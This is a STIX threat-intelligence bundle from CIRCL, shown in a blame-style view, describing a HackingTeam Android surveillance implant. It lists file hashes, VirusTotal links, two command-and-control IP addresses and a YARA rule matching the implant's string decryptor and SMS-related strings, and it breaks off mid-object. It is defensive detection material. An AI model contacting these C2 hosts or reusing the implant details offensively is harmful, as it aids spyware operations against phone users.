2023-04-21 13:25:09 +00:00
|
|
|
{
|
2023-06-14 17:31:25 +00:00
|
|
|
"type": "bundle",
|
|
|
|
"id": "bundle--582adfcb-6640-46bf-ba1f-4aca950d210f",
|
|
|
|
"objects": [
|
|
|
|
{
|
|
|
|
"type": "identity",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:43:55.000Z",
|
|
|
|
"modified": "2016-11-15T10:43:55.000Z",
|
|
|
|
"name": "CIRCL",
|
|
|
|
"identity_class": "organization"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "report",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "report--582adfcb-6640-46bf-ba1f-4aca950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:43:55.000Z",
|
|
|
|
"modified": "2016-11-15T10:43:55.000Z",
|
|
|
|
"name": "OSINT - HackingTeam back for your Androids, now extra insecure!",
|
|
|
|
"published": "2016-11-15T10:44:39Z",
|
|
|
|
"object_refs": [
|
|
|
|
"observed-data--582adfde-3f7c-47f7-82ac-4146950d210f",
|
|
|
|
"url--582adfde-3f7c-47f7-82ac-4146950d210f",
|
|
|
|
"indicator--582ae025-fbc0-4426-b31c-4f6d950d210f",
|
|
|
|
"indicator--582ae025-9014-49d4-8258-43e3950d210f",
|
|
|
|
"indicator--582ae025-8698-43d4-b114-41bb950d210f",
|
|
|
|
"indicator--582ae026-de30-4ef7-a4b9-49ca950d210f",
|
|
|
|
"indicator--582ae5ec-8338-4d70-84bc-435e02de0b81",
|
|
|
|
"indicator--582ae5ec-addc-4442-928a-427e02de0b81",
|
|
|
|
"observed-data--582ae5ec-7c10-4df6-bda2-4d6002de0b81",
|
|
|
|
"url--582ae5ec-7c10-4df6-bda2-4d6002de0b81",
|
|
|
|
"indicator--582ae5ed-3c64-48ad-b8bb-4b3e02de0b81",
|
|
|
|
"indicator--582ae5ed-c588-46b4-8052-40a402de0b81",
|
|
|
|
"observed-data--582ae5ed-7e94-4dfd-8e88-45be02de0b81",
|
|
|
|
"url--582ae5ed-7e94-4dfd-8e88-45be02de0b81",
|
|
|
|
"indicator--582ae5ed-5080-4e70-b5e4-4e0302de0b81",
|
|
|
|
"indicator--582ae5ee-a844-4b86-9e4e-449f02de0b81",
|
|
|
|
"observed-data--582ae5ee-92e0-45eb-9e4d-40f202de0b81",
|
|
|
|
"url--582ae5ee-92e0-45eb-9e4d-40f202de0b81",
|
|
|
|
"indicator--582ae5ee-97cc-4e28-8b99-45c702de0b81",
|
|
|
|
"indicator--582ae5ee-4ef4-44ab-9022-46fa02de0b81",
|
|
|
|
"observed-data--582ae5ee-9580-4da9-9118-48ad02de0b81",
|
|
|
|
"url--582ae5ee-9580-4da9-9118-48ad02de0b81",
|
|
|
|
"indicator--582ae62d-3180-4824-b898-40af950d210f",
|
|
|
|
"indicator--582ae678-60f4-49dd-9680-4533950d210f",
|
|
|
|
"indicator--582ae695-7fd8-4183-b00e-484f950d210f",
|
|
|
|
"x-misp-attribute--582ae6df-a770-49ef-ad0b-4c77950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"Threat-Report",
|
|
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
|
|
"osint:source-type=\"blog-post\"",
|
|
|
|
"ms-caro-malware:malware-platform=\"AndroidOS\""
|
|
|
|
],
|
|
|
|
"object_marking_refs": [
|
|
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--582adfde-3f7c-47f7-82ac-4146950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:13:50.000Z",
|
|
|
|
"modified": "2016-11-15T10:13:50.000Z",
|
|
|
|
"first_observed": "2016-11-15T10:13:50Z",
|
|
|
|
"last_observed": "2016-11-15T10:13:50Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--582adfde-3f7c-47f7-82ac-4146950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--582adfde-3f7c-47f7-82ac-4146950d210f",
|
|
|
|
"value": "http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae025-fbc0-4426-b31c-4f6d950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:15:01.000Z",
|
|
|
|
"modified": "2016-11-15T10:15:01.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:15:01Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae025-9014-49d4-8258-43e3950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:15:01.000Z",
|
|
|
|
"modified": "2016-11-15T10:15:01.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:15:01Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae025-8698-43d4-b114-41bb950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:15:01.000Z",
|
|
|
|
"modified": "2016-11-15T10:15:01.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:15:01Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae026-de30-4ef7-a4b9-49ca950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:15:02.000Z",
|
|
|
|
"modified": "2016-11-15T10:15:02.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:15:02Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae5ec-8338-4d70-84bc-435e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:40.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:40.000Z",
|
|
|
|
"description": "- Xchecked via VT: 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '03ea8043d16ecb9a462cc99d26b80889671e7621']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:39:40Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae5ec-addc-4442-928a-427e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:40.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:40.000Z",
|
|
|
|
"description": "- Xchecked via VT: 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'badbbb8189d3aa6d0352bf8a02c1e79d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:39:40Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--582ae5ec-7c10-4df6-bda2-4d6002de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:40.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:40.000Z",
|
|
|
|
"first_observed": "2016-11-15T10:39:40Z",
|
|
|
|
"last_observed": "2016-11-15T10:39:40Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--582ae5ec-7c10-4df6-bda2-4d6002de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--582ae5ec-7c10-4df6-bda2-4d6002de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c/analysis/1479180111/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae5ed-3c64-48ad-b8bb-4b3e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:41.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:41.000Z",
|
|
|
|
"description": "- Xchecked via VT: e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'a65f80a623269307067416225ce2a6cfc0557ac4']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:39:41Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae5ed-c588-46b4-8052-40a402de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:41.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:41.000Z",
|
|
|
|
"description": "- Xchecked via VT: e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'cbd1c2db9ffc6b67cea46d271594c2ae']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:39:41Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--582ae5ed-7e94-4dfd-8e88-45be02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:41.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:41.000Z",
|
|
|
|
"first_observed": "2016-11-15T10:39:41Z",
|
|
|
|
"last_observed": "2016-11-15T10:39:41Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--582ae5ed-7e94-4dfd-8e88-45be02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--582ae5ed-7e94-4dfd-8e88-45be02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c/analysis/1479180040/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae5ed-5080-4e70-b5e4-4e0302de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:41.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:41.000Z",
|
|
|
|
"description": "- Xchecked via VT: ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'f60c545f08c74de317458c416a8768835bafe41b']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:39:41Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae5ee-a844-4b86-9e4e-449f02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:42.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:42.000Z",
|
|
|
|
"description": "- Xchecked via VT: ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818",
|
|
|
|
"pattern": "[file:hashes.MD5 = '3c1055f19971d580ef9ced172d8eba3b']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:39:42Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--582ae5ee-92e0-45eb-9e4d-40f202de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:42.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:42.000Z",
|
|
|
|
"first_observed": "2016-11-15T10:39:42Z",
|
|
|
|
"last_observed": "2016-11-15T10:39:42Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--582ae5ee-92e0-45eb-9e4d-40f202de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--582ae5ee-92e0-45eb-9e4d-40f202de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818/analysis/1477481986/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae5ee-97cc-4e28-8b99-45c702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:42.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:42.000Z",
|
|
|
|
"description": "- Xchecked via VT: 07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'c0802514739173623a319db4551f88d2ca71bdb2']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:39:42Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae5ee-4ef4-44ab-9022-46fa02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:42.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:42.000Z",
|
|
|
|
"description": "- Xchecked via VT: 07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31",
|
|
|
|
"pattern": "[file:hashes.MD5 = '60f0c18fae934d1033394d62951d5dc8']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:39:42Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--582ae5ee-9580-4da9-9118-48ad02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:39:42.000Z",
|
|
|
|
"modified": "2016-11-15T10:39:42.000Z",
|
|
|
|
"first_observed": "2016-11-15T10:39:42Z",
|
|
|
|
"last_observed": "2016-11-15T10:39:42Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--582ae5ee-9580-4da9-9118-48ad02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--582ae5ee-9580-4da9-9118-48ad02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31/analysis/1479179966/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae62d-3180-4824-b898-40af950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:40:45.000Z",
|
|
|
|
"modified": "2016-11-15T10:40:45.000Z",
|
|
|
|
"pattern": "[rule HackingTeam_Android : Android Implant\r\n{\r\n\tmeta:\r\n\t\tdescription = \"HackingTeam Android implant, known to detect version v4 - v7\"\r\n\t\tauthor = \"Tim 'diff' Strazzere <strazz@gmail.com>\"\r\n reference = \"http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/\"\r\n\t\tdate = \"2016-11-14\"\r\n\t\tversion = \"1.0\"\r\n strings:\r\n $decryptor = {\r\n 12 01 // const/4 v1, 0x0\r\n D8 00 ?? ?? // add-int/lit8 ??, ??, ??\r\n 6E 10 ?? ?? ?? 00 // invoke-virtual {??} -> String.toCharArray()\r\n 0C 04 // move-result-object v4\r\n 21 45 // array-length v5, v4\r\n 01 02 // move v2, v0\r\n 01 10 // move v0, v1\r\n 32 50 11 00 // if-eq v0, v5, 0xb\r\n 49 03 04 00 // aget-char v3, v4, v0\r\n DD 06 02 5F // and-int/lit8 v6, v2, 0x5f <- potentially change the hardcoded xor bit to ??\r\n B7 36 // xor-int/2addr v6, v3\r\n D8 03 02 ?? // and-int/lit8 v3, v2, ??\r\n D8 02 00 01 // and-int/lit8 v2, v0, 0x1\r\n 8E 66 // int-to-char v6, v6\r\n 50 06 04 00 // aput-char v6, v4, v0\r\n 01 20 // move v0, v2\r\n 01 32 // move v2, v3\r\n 28 F0 // goto 0xa\r\n 71 30 ?? ?? 14 05 // invoke-static {v4, v1, v5}, ?? -> String.valueOf()\r\n 0C 00 // move-result-object v0\r\n 6E 10 ?? ?? 00 00 // invoke-virtual {v0} ?? -> String.intern()\r\n 0C 00 // move-result-object v0\r\n 11 00 // return-object v0\r\n }\r\n // Below is the following string, however encoded as it would appear in the string table (length encoded, null byte padded)\r\n // Lcom/google/android/global/Settings;\r\n $settings = {\r\n 00 24 4C 63 6F 6D 2F 67 6F 6F 67 6C 65 2F 61 6E\r\n 64 72 6F 69 64 2F 67 6C 6F 62 61 6C 2F 53 65 74\r\n 74 69 6E 67 73 3B 00\r\n }\r\n // getSmsInputNumbers (Same encoded described above)\r\n $getSmsInputNumbers = {\r\n 00 12 67 65 74 53 6D 73 49 6E 70 75 74 4E 75 6D\r\n 62 65 72 73 00\r\n }\r\n condition:\r\n $decryptor and ($settings and $getSmsInputNumbers)\r\n}]",
|
|
|
|
"pattern_type": "yara",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:40:45Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Artifacts dropped"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"yara\"",
|
|
|
|
"misp:category=\"Artifacts dropped\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae678-60f4-49dd-9680-4533950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:42:00.000Z",
|
|
|
|
"modified": "2016-11-15T10:42:00.000Z",
|
|
|
|
"description": "C2 for 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c",
|
|
|
|
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '68.233.237.11']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:42:00Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"ip-dst\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--582ae695-7fd8-4183-b00e-484f950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:42:29.000Z",
|
|
|
|
"modified": "2016-11-15T10:42:29.000Z",
|
|
|
|
"description": "C2 for 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c",
|
|
|
|
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '66.232.100.221']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-11-15T10:42:29Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"ip-dst\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-attribute",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-attribute--582ae6df-a770-49ef-ad0b-4c77950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-11-15T10:43:55.000Z",
|
|
|
|
"modified": "2016-11-15T10:43:55.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"text\"",
|
|
|
|
"misp:category=\"Network activity\""
|
|
|
|
],
|
|
|
|
"x_misp_category": "Network activity",
|
|
|
|
"x_misp_comment": "RequestActionsToExecute - Request",
|
|
|
|
"x_misp_type": "text",
